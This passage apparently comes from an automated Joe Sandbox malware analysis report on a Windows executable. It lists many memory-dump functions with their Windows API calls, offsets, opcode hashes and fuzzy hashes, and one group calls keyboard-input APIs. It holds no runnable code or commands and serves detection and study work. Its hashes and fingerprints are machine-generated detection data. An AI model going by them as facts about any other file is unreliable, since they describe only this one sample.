                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$InputSend
                          • String ID:
                          • API String ID: 2221674350-0
                          • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                          • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                          • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                          • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _wcscpy$_wcscat
                          • String ID:
                          • API String ID: 2037614760-0
                          • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                          • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                          • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                          • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                          APIs
                          • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                          • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                          • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                          • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                          • VariantClear.OLEAUT32(?), ref: 00451CA1
                          • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Variant$Copy$AllocClearErrorLastString
                          • String ID:
                          • API String ID: 960795272-0
                          • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                          • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                          • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                          • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                          APIs
                          • BeginPaint.USER32(00000000,?), ref: 00447BDF
                          • GetWindowRect.USER32(?,?), ref: 00447C5D
                          • ScreenToClient.USER32(?,?), ref: 00447C7B
                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                          • EndPaint.USER32(?,?), ref: 00447D13
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                          • String ID:
                          • API String ID: 4189319755-0
                          • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                          • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                          • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                          • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                          APIs
                          • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                          • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                          • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                          • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                          • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend$LongWindow$InvalidateRect
                          • String ID:
                          • API String ID: 1976402638-0
                          • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                          • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                          • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                          • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                          APIs
                          • ShowWindow.USER32(?,00000000), ref: 00440A8A
                          • EnableWindow.USER32(?,00000000), ref: 00440AAF
                          • ShowWindow.USER32(?,00000000), ref: 00440B18
                          • ShowWindow.USER32(?,00000004), ref: 00440B2B
                          • EnableWindow.USER32(?,00000001), ref: 00440B50
                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Window$Show$Enable$MessageSend
                          • String ID:
                          • API String ID: 642888154-0
                          • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                          • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                          • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                          • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Variant$Copy$ClearErrorLast
                          • String ID: NULL Pointer assignment$Not an Object type
                          • API String ID: 2487901850-572801152
                          • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                          • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                          • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                          • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                          APIs
                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Window$Enable$Show$MessageSend
                          • String ID:
                          • API String ID: 1871949834-0
                          • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                          • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                          • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                          • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                          • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                          • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                          • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                          APIs
                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                          • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                          • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                          • SendMessageW.USER32 ref: 00471AE3
                          • DestroyIcon.USER32(?), ref: 00471AF4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                          • String ID:
                          • API String ID: 3611059338-0
                          • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                          • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                          • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                          • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: DestroyWindow$DeleteObject$IconMove
                          • String ID:
                          • API String ID: 1640429340-0
                          • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                          • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                          • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                          • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                          APIs
                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                          • _wcslen.LIBCMT ref: 004438CD
                          • _wcslen.LIBCMT ref: 004438E6
                          • _wcstok.LIBCMT ref: 004438F8
                          • _wcslen.LIBCMT ref: 0044390C
                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                          • _wcstok.LIBCMT ref: 00443931
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                          • String ID:
                          • API String ID: 3632110297-0
                          • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                          • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                          • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                          • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Destroy$DeleteMenuObject$IconWindow
                          • String ID:
                          • API String ID: 752480666-0
                          • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                          • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                          • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                          • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                          • String ID:
                          • API String ID: 3275902921-0
                          • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                          • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                          • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                          • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                          • String ID:
                          • API String ID: 3275902921-0
                          • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                          • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                          • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                          • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                          APIs
                          • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                          • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: PerformanceQuery$CounterSleep$Frequency
                          • String ID:
                          • API String ID: 2833360925-0
                          • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                          • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                          • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                          • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                          APIs
                          • SendMessageW.USER32 ref: 004555C7
                          • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                          • DeleteObject.GDI32(?), ref: 00455736
                          • DeleteObject.GDI32(?), ref: 00455744
                          • DestroyIcon.USER32(?), ref: 00455752
                          • DestroyWindow.USER32(?), ref: 00455760
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: DeleteDestroyMessageObjectSend$IconWindow
                          • String ID:
                          • API String ID: 3691411573-0
